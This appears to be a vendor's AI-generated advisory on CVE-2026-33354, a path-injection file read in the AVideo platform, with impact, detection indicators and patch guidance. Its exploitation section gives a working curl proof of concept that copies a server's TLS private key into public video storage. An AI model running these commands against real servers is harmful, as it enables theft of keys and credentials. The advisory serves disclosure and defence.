CVE-2026-33354: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-33354 is an authenticated arbitrary local file read vulnerability in WWBN AVideo, an open-source video platform. The flaw exists in the POST /objects/aVideoEncoder.json.php endpoint, which accepts a requester-controlled chunkFile parameter without properly restricting it to trusted server-generated paths. All versions up to and including 26.0 are affected. The vulnerability was published on March 19, 2026, with a patch commit available shortly after. It carries a CVSS v3.1 base score of 6.5 (High) per NVD, and 7.6 (High) per the GitHub Security Advisory (GitHub Advisory).

Technical details

The root cause is CWE-73 (External Control of File Name or Path): the aVideoEncoder.json.php endpoint passes the attacker-supplied chunkFile parameter through the isValidURLOrPath() helper, which permits files under broad server directories including /var/www/, the application root, cache, tmp, and videos directories, only rejecting .php files. The endpoint then copies the specified local file into the attacker's public video storage path, making it downloadable over HTTP. Exploitation requires an authenticated account with upload permissions and at least one editable video record owned by the attacker; the target file must also be readable by the web application user. A proof-of-concept using curl commands was included in the security advisory, demonstrating exfiltration of TLS private keys (GitHub Advisory).

Impact

Successful exploitation allows an authenticated low-privileged user to read arbitrary local files accessible to the web server process, including TLS private keys, application configuration files, database credentials, and other sensitive data stored under /var/www/ and related directories. The exfiltrated files are copied into the attacker's public video storage and can be downloaded over plain HTTP without further authentication. While there is no direct integrity or availability impact, disclosure of TLS private keys or credentials could enable further attacks such as traffic decryption, credential reuse, or lateral movement within the infrastructure (GitHub Advisory).

Exploitability

A functional proof-of-concept exploit consisting of step-by-step curl commands is publicly available in the GitHub Security Advisory, confirmed to successfully read and exfiltrate local TLS private keys from a real AVideo deployment (GitHub Advisory). There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.041% (0.000410), indicating a currently low probability of widespread exploitation. Exploitation requires only a low-privileged authenticated account, making it accessible to any registered user with upload permissions.

Exploitation steps

  1. Authenticate as a low-privileged uploader: Log in to the AVideo instance using an account with upload permissions.
curl -s -c attacker.cookies \
  -d 'user=attacker&pass=UserPass123!' \
  http://TARGET/objects/login.json.php
  1. Create an attacker-owned video: Upload a minimal video file to obtain a videos_id and filename for the attacker's video record.
printf 'x' > poc.mp4
curl -s -b attacker.cookies \
  -F 'upl=@poc.mp4;type=video/mp4' \
  http://TARGET/view/mini-upload-form/upload.php
# Note the returned videos_id (e.g., 4) and filename (e.g., poc_69bb86db62c308.68438735)
  1. Inject a local file path via chunkFile: Send a POST request to aVideoEncoder.json.php with the attacker's videos_id, an allowed format, and the target local file path as chunkFile.
curl -s -b attacker.cookies \
  -d 'videos_id=4&format=mp4&title=poc&description=test&chunkFile=/var/www/html/AVideo/.compose/letsencrypt/live/localhost/privkey.pem' \
  http://TARGET/objects/aVideoEncoder.json.php
  1. Download the exfiltrated file: Retrieve the copied file from the attacker's public video URL.
curl -s http://TARGET/videos/poc_69bb86db62c308.68438735/poc_69bb86db62c308.68438735.mp4 | head
# Output begins with: -----BEGIN PRIVATE KEY-----

(GitHub Advisory)

Indicators of compromise

  • Network: Unusual POST requests to /objects/aVideoEncoder.json.php containing a chunkFile parameter with absolute filesystem paths (e.g., /var/www/, /etc/, /home/) rather than expected chunk filenames; subsequent GET requests to /videos/<filename>/<filename>.mp4 immediately after such POST requests from the same source IP.
  • Logs: Web server access logs showing POST requests to aVideoEncoder.json.php with chunkFile values containing path separators (/) pointing to non-video directories; repeated access to the same video URL from the uploading account's session shortly after encoding requests.
  • File System: Unexpected non-video files (e.g., .pem, .conf, .env, .key) appearing in the AVideo /videos/ storage directory with .mp4 extensions; file modification timestamps on video storage files that do not correspond to legitimate encoding activity.
  • Process: Web server process (e.g., www-data) reading files outside the expected video upload directories, observable via audit logs or file access monitoring tools.

Mitigation and workarounds

The patch is available in commit 59bbd601a3f65a5b18c1d9e4eb11471c0a59214f in the WWBN/AVideo repository; users should update to any version newer than 26.0 (GitHub Advisory, Patch Commit). As a workaround prior to patching, restrict access to aVideoEncoder.json.php at the web server level (e.g., via .htaccess or nginx configuration) to trusted IP ranges only. Additionally, implement additional server-side validation to restrict the chunkFile parameter to only server-generated chunk paths within the designated upload/tmp directory. Review web server access logs for suspicious chunkFile parameter values as described in the IOCs section.

Community reactions

The vulnerability was reported by researcher gr00ve3 and published via the WWBN/AVideo GitHub Security Advisory on March 19, 2026 (GitHub Advisory). Brief community discussion was observed on Mastodon and Bluesky shortly after the CVE was published to NVD on March 23, 2026. A technical write-up was published at infinitsec.net covering the vulnerability mechanics. No major vendor statements or significant media coverage beyond standard vulnerability tracking databases have been identified.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management